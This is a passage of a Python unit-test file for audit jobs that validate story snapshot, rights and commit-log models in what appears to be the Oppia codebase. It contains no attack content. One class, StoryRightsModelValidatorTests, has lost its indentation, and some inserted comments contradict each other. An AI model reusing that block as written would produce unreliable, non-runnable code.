                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_ids having value 0, expect model '
                'StoryModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StorySnapshotMetadataModel\', 2]')]
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's settings model makes the
        committer_ids reference dangling.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'StorySnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """A snapshot id with a version beyond the story model's current
        version fails the version check.
        """
        model_with_invalid_version_in_id = (
            story_models.StorySnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story model '
                'version check of StorySnapshotMetadataModel\', '
                '[u\'Entity id 0-3: Story model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated StorySnapshotMetadataModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    # Renamed from test_model_with_invalid_commit_cmd_schmea to fix the
    # spelling of 'schema'; behavior is unchanged.
    def test_model_with_invalid_commit_cmd_schema(self):
        """Commit commands with missing or extra attributes fail the
        per-command schema checks.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_story_node'
        }, {
            'cmd': 'delete_story_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_story_node check of '
                'StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_story_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'node_id, The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd add_story_node '
                'check of StorySnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_story_node\'} '
                'failed with error: The following required attributes '
                'are missing: node_id, title"]]'
            ), u'[u\'fully-validated StorySnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StorySnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    StorySnapshotContentModel entities.
    """

    def setUp(self):
        """Creates three stories and stores their version-1 snapshot
        content models.
        """
        super(StorySnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StorySnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StorySnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StorySnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StorySnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """Updating a story (adding a fourth snapshot) should leave all
        models fully validated.
        """
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StorySnapshotContentModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """A created_on later than last_updated fails the time field
        relation check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StorySnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StorySnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """With a mocked clock 13 hours in the past, last_updated appears
        to be in the future and fails the current time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StorySnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the parent story makes the story_ids reference
        dangling; both resulting snapshots are reported.
        """
        story_models.StoryModel.get_by_id('0').delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StorySnapshotContentModel\', '
                '[u"Entity id 0-1: based on field story_ids '
                'having value 0, expect model StoryModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_ids having value 0, expect model '
                'StoryModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StorySnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """A snapshot id with a version beyond the story model's current
        version fails the version check.
        """
        model_with_invalid_version_in_id = (
            story_models.StorySnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story model '
                'version check of StorySnapshotContentModel\', '
                '[u\'Entity id 0-3: Story model corresponding to '
                'id 0 has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ), (
                u'[u\'fully-validated StorySnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(StoryRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.admin = user_services.UserActionsInfo(self.admin_id)
manager1_email = 'user@manager1.com'
manager2_email = 'user@manager2.com'
self.signup(manager1_email, 'manager1')
self.signup(manager2_email, 'manager2')
self.set_topic_managers(['manager1', 'manager2'])
self.manager1_id = self.get_user_id_from_email(manager1_email)
self.manager2_id = self.get_user_id_from_email(manager2_email)
self.manager1 = user_services.UserActionsInfo(self.manager1_id)
self.manager2 = user_services.UserActionsInfo(self.manager2_id)
topic = topic_domain.Topic.create_default_topic(
topic_id='0', name='topic')
stories = [story_domain.Story.create_default_story(
'%s' % i,
title='title %d' % i,
corresponding_topic_id='0'
) for i in xrange(3)]
for story in stories:
story_services.save_new_story(self.owner_id, story)
topic.add_canonical_story(story.id)
topic_services.save_new_topic(self.owner_id, topic)
story_services.assign_role(
self.admin, self.manager1, story_domain.ROLE_MANAGER, stories[0].id)
story_services.assign_role(
self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[0].id)
story_services.assign_role(
self.admin, self.manager2, story_domain.ROLE_MANAGER, stories[1].id)
self.model_instance_0 = story_models.StoryRightsModel.get_by_id('0')
self.model_instance_1 = story_models.StoryRightsModel.get_by_id('1')
self.model_instance_2 = story_models.StoryRightsModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.StoryRightsModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated StoryRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of StoryRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'StoryRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_story_model_failure(self):
story_models.StoryModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for story_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field story_ids having '
'value 0, expect model StoryModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_manager_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.manager1_id).delete()
expected_output = [
(
u'[u\'failed validation check for manager_user_ids '
'field check of StoryRightsModel\', '
'[u"Entity id 0: based on field manager_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (
self.manager1_id, self.manager1_id),
u'[u\'fully-validated StoryRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting the version-1 snapshot metadata model must fail the
        snapshot_metadata_ids field check of the StoryRightsModel."""
        story_models.StoryRightsSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of StoryRightsModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model '
                'StoryRightsSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """Deleting the version-1 snapshot content model must fail the
        snapshot_content_ids field check of the StoryRightsModel."""
        story_models.StoryRightsSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of StoryRightsModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model StoryRightsSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated StoryRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the StoryRightsSnapshotMetadataModel audit job.

    Python 2 era code (uses xrange). Each test seeds one topic with three
    stories (ids '0'-'2') and validates the '<story id>-1' snapshot
    metadata models produced by saving them.
    """

    def setUp(self):
        """Creates the topic/stories; story '0' is committed by self.user_id
        and the others by self.owner_id, so committer checks can target
        either user."""
        super(StoryRightsSnapshotMetadataModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            if story.id != '0':
                story_services.save_new_story(self.owner_id, story)
            else:
                story_services.save_new_story(self.user_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StoryRightsSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StoryRightsSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StoryRightsSnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StoryRightsSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three snapshot metadata models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-field relation
        check for that entity only."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated "in the future" (via mocked datetime) fails the
        current-time check."""
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # 13-hour-offset mock clock so last_updated exceeds the job run time.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_rights_model_failure(self):
        """Deleting the parent StoryRightsModel breaks the story_rights_ids
        reference of both of its snapshots (versions 1 and 2)."""
        story_models.StoryRightsModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_rights_ids '
                'field check of StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field story_rights_ids '
                'having value 0, expect model StoryRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_rights_ids having value 0, expect model '
                'StoryRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_committer_model_failure(self):
        """Deleting the committer's UserSettingsModel fails the
        committer_ids field check."""
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """A snapshot id whose version part (3) exceeds the StoryRights
        model's version (1) fails the version check."""
        model_with_invalid_version_in_id = (
            story_models.StoryRightsSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story rights model '
                'version check of StoryRightsSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: StoryRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotMetadataModel\', 3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit cmds that violate their domain schema (missing required
        attribute / extra attribute) are reported per command.

        NOTE(review): 'schmea' is a typo for 'schema' in the method name;
        left unchanged to keep the code byte-identical.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'change_role',
            'assignee_id': 'id',
            'new_role': 'manager'
        }, {
            'cmd': 'publish_story',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_role check of '
                'StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'assignee_id\': u\'id\', '
                'u\'cmd\': u\'change_role\', u\'new_role\': u\'manager\'} '
                'failed with error: The following required attributes '
                'are missing: old_role"]]'
            ), (
                u'[u\'failed validation check for commit cmd publish_story '
                'check of StoryRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'publish_story\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), u'[u\'fully-validated StoryRightsSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class StoryRightsSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the StoryRightsSnapshotContentModel audit job."""

    def setUp(self):
        """Seeds one topic with three stories ('0'-'2') saved by the owner
        and fetches the version-1 snapshot content models."""
        super(StoryRightsSnapshotContentModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StoryRightsSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            story_models.StoryRightsSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            story_models.StoryRightsSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StoryRightsSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three snapshot content models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated StoryRightsSnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-field relation
        check for that entity only."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated "in the future" (via mocked datetime) fails the
        current-time check."""
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # 13-hour-offset mock clock so last_updated exceeds the job run time.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the parent StoryRightsModel breaks the story_rights_ids
        reference of both of its snapshots (versions 1 and 2)."""
        story_models.StoryRightsModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_rights_ids '
                'field check of StoryRightsSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field story_rights_ids '
                'having value 0, expect model StoryRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'story_rights_ids having value 0, expect model '
                'StoryRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'StoryRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_story_version_in_model_id(self):
        """A snapshot id whose version part (3) exceeds the StoryRights
        model's version (1) fails the version check."""
        model_with_invalid_version_in_id = (
            story_models.StoryRightsSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story rights model '
                'version check of StoryRightsSnapshotContentModel\', '
                '[u\'Entity id 0-3: StoryRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot content model id\']]'
            ), (
                u'[u\'fully-validated StoryRightsSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class StoryCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the StoryCommitLogEntryModel audit job."""

    def setUp(self):
        """Seeds one topic with three stories and fetches the
        'story-<id>-1' commit log entries created by saving them."""
        super(StoryCommitLogEntryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        topic = topic_domain.Topic.create_default_topic(
            topic_id='0', name='topic')
        stories = [story_domain.Story.create_default_story(
            '%s' % i,
            title='title %d' % i,
            corresponding_topic_id='0'
        ) for i in xrange(3)]
        for story in stories:
            story_services.save_new_story(self.owner_id, story)
            topic.add_canonical_story(story.id)
        topic_services.save_new_topic(self.owner_id, topic)
        self.model_instance_0 = (
            story_models.StoryCommitLogEntryModel.get_by_id(
                'story-0-1'))
        self.model_instance_1 = (
            story_models.StoryCommitLogEntryModel.get_by_id(
                'story-1-1'))
        self.model_instance_2 = (
            story_models.StoryCommitLogEntryModel.get_by_id(
                'story-2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .StoryCommitLogEntryModelAuditOneOffJob)

    def test_standard_operation(self):
        """An additional valid commit raises the fully-validated count
        to 4."""
        story_services.update_story(
            self.owner_id, '0', [story_domain.StoryChange({
                'cmd': 'update_story_property',
                'property_name': 'title',
                'new_value': 'New title',
                'old_value': 'title 0'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated StoryCommitLogEntryModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-field relation
        check for that entity only."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of StoryCommitLogEntryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated "in the future" (via mocked datetime) fails the
        current-time check."""
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'StoryCommitLogEntryModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # 13-hour-offset mock clock so last_updated exceeds the job run time.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_story_model_failure(self):
        """Deleting the backing StoryModel breaks the story_ids reference
        of both of its commit log entries (versions 1 and 2).

        Note this test compares via literal_eval rather than sorting.
        """
        story_models.StoryModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for story_ids '
                'field check of StoryCommitLogEntryModel\', '
                '[u"Entity id story-0-1: based on field story_ids '
                'having value 0, expect model StoryModel with id 0 '
                'but it doesn\'t exist", u"Entity id story-0-2: based '
                'on field story_ids having value 0, expect model '
                'StoryModel with id 0 but it doesn\'t exist"]]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, literal_eval=True)

    def test_invalid_story_version_in_model_id(self):
        """A commit log id whose version part (3) exceeds the story's
        version (1) fails the version check."""
        model_with_invalid_version_in_id = (
            story_models.StoryCommitLogEntryModel.create(
                '0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
                'msg', [{}],
                constants.ACTIVITY_STATUS_PUBLIC, False))
        model_with_invalid_version_in_id.story_id = '0'
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for story model '
                'version check of StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Story model corresponding '
                'to id 0 has a version 1 which is less than '
                'the version 3 in commit log entry model id\']]'
            ) % (model_with_invalid_version_in_id.id),
            u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_id(self):
        """An id not matching the 'story-<id>-<version>' pattern fails the
        model id regex check (and, lacking a recognized prefix, the commit
        cmd check as well)."""
        model_with_invalid_id = (
            story_models.StoryCommitLogEntryModel(
                id='invalid-0-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, commit_type='edit',
                commit_message='msg', commit_cmds=[{}],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_is_private=False))
        model_with_invalid_id.story_id = '0'
        model_with_invalid_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for model id check of '
                'StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Entity id does not match regex pattern\']]'
            ) % (model_with_invalid_id.id), (
                u'[u\'failed validation check for commit cmd check of '
                'StoryCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
                'No commit command domain object defined for entity with '
                'commands: [{}]\']]'),
            u'[u\'fully-validated StoryCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_type(self):
        """A commit_type outside the allowed set fails the commit type
        check."""
        self.model_instance_0.commit_type = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit type check of '
                'StoryCommitLogEntryModel\', '
                '[u\'Entity id story-0-1: Commit type invalid is '
                'not allowed\']]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_post_commit_status(self):
        """A post_commit_status outside the allowed set fails the post
        commit status check."""
        self.model_instance_0.post_commit_status = 'invalid'
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit status check '
                'of StoryCommitLogEntryModel\', '
                '[u\'Entity id story-0-1: Post commit status invalid '
                'is invalid\']]'
            ), u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_true_post_commit_is_private(self):
        """post_commit_is_private=True contradicts a 'public' status."""
        self.model_instance_0.post_commit_status = 'public'
        self.model_instance_0.post_commit_is_private = True
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'public but post_commit_is_private is True\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_false_post_commit_is_private(self):
        """post_commit_is_private=False contradicts a 'private' status."""
        self.model_instance_0.post_commit_status = 'private'
        self.model_instance_0.post_commit_is_private = False
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of StoryCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'private but post_commit_is_private is False\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated StoryCommitLogEntryModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit cmds that violate their domain schema (missing required
